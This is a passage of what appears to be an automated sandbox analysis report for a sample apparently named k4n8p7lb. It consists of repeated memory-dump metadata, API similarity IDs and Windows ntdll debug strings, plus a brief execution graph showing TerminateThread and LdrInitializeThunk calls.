                                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E919372
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919178
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1745908468
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8DD879
                                                                                                                                                        • Part of subcall function 1E8B4779: RtlDebugPrintTimes.NTDLL ref: 1E8B4817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$$0,s$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-2237523536
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8A651C
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A6614
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A665F
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9097A0, 1E9097C9
                                                                                                                                                      • apphelp.dll, xrefs: 1E8A6446
                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9097B9
                                                                                                                                                      • LdrpInitShimEngine, xrefs: 1E909783, 1E909796, 1E9097BF
                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E90977C
                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E909790
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                      • API String ID: 3446177414-4227709934
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                      • API String ID: 3446177414-3492000579
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E909854, 1E909895
                                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909843
                                                                                                                                                      • LdrpLoadShimEngine, xrefs: 1E90984A, 1E90988B
                                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909885
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • HEAP: , xrefs: 1E95ECDD
                                                                                                                                                      • ---------------------------------------, xrefs: 1E95EDF9
                                                                                                                                                      • Entry Heap Size , xrefs: 1E95EDED
                                                                                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E95EDE3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                      • API String ID: 3446177414-1102453626
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpFindDllActivationContext, xrefs: 1E923440, 1E92346C
                                                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 1E923466
                                                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 1E92344A, 1E923476
                                                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E923439
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-3779518884
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 1E91A7A5
                                                                                                                                                      • apphelp.dll, xrefs: 1E8D2382
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E91A7AF
                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E91A79F
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E919F2E
                                                                                                                                                      • LdrpCheckModule, xrefs: 1E919F24
                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 1E919F1C
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 1E9280E2
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9280F3
                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 1E9280E9
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1E934508
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 1E934519
                                                                                                                                                      • LdrpCheckRedirection, xrefs: 1E93450F
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Wow64 Emulation Layer
                                                                                                                                                      • API String ID: 3446177414-921169906
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4281723722-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0$Flst
                                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • kLsE, xrefs: 1E8B05FE
                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E8B0586
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: 0$0
                                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:9
                                                                                                                                                      Total number of Limit Nodes:1

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 80527 573a84 80528 573a8b 80527->80528 80528->80527 80529 573a5a TerminateThread 80528->80529 80530 573a71 80528->80530 80529->80530 80539 1e8f2b20 80541 1e8f2b2a 80539->80541 80542 1e8f2b3f LdrInitializeThunk 80541->80542 80543 1e8f2b31 80541->80543 80547 1e8f29f0 LdrInitializeThunk

                                                                                                                                                      Executed Functions

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
